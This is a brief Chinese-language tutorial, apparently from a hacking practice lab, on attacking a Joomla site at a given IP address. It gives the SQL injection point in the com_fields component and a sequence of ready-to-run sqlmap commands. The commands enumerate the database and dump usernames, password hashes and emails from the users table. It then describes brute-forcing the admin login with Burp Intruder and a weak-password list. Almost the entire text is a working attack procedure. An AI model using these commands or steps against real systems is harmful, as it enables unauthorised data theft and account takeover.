这里我用的是 joomla 先进入 txt 网站平台 网站:http://110.40.154.100:8080/?id=1
第一步:找注入点
"http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]="
第二步:打开kali 用sqlmap 爆破 找其数据库名(过程很慢 耐心等待)
sqlmap -u "http://110.40.154.100:8080/index.php option=com_fields&view=fields&layout=modal&list[fullordering]=" --dbs
第三步:在joomla 库中找表名 (过程很慢 耐心等待)
sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomla --tables
这样表名就出来了
第四步:在表中找字段名 (过程很慢 耐心等待)
sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomla -T '#__users' --columns
这样列名就出来了
最后一步 找 用户名、密码和邮箱
sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -D joomla -T '#__users' -C username,password,email --dump
稍等一会 用户名、密码和邮箱就已经破解成功了(这里的密码进行加密了)
接着我们进入到 burp中 开始破解密码
先设置代理 账号root 密码随便输一个开始抓包
这里已经抓好包了 我们把它发送到 intruder模块进行爆破
将里边的变量清除 将密码添加变量 再进入到payloads里
再 打开 zidian(弱口令)破解 再点击startattack 进行弱口令破解
这样就破解完成了 可以看到 root 和admin 的字段和其他人不一样 ,所以密码就是这两个中的其一